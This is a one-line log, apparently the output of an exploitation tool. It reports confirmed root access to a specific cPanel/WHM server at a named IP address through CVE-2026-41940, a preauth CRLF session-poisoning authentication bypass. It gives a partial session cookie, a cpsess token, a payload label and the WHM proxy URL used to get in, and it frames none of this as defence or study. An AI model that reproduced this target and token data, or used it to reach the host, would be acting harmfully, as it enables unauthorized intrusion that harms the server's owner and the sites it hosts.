http://182.160.155.166 | CVE-2026-41940 [CONFIRMÉ] | ROOT ACCESS confirmé — cPanel v11.120.0.5 | session: :2kV77Zc7R_Gjg3k... | token: cpsess7533698224 [dynamic] | payload: sniper | https://182.160.155.166/___proxy_subdomain_whm | CVE-2026-41940 — cPanel/WHM CRLF auth bypass CVSS 10.0 — preauth session poisoning → root WHM (~70M domaines affectés)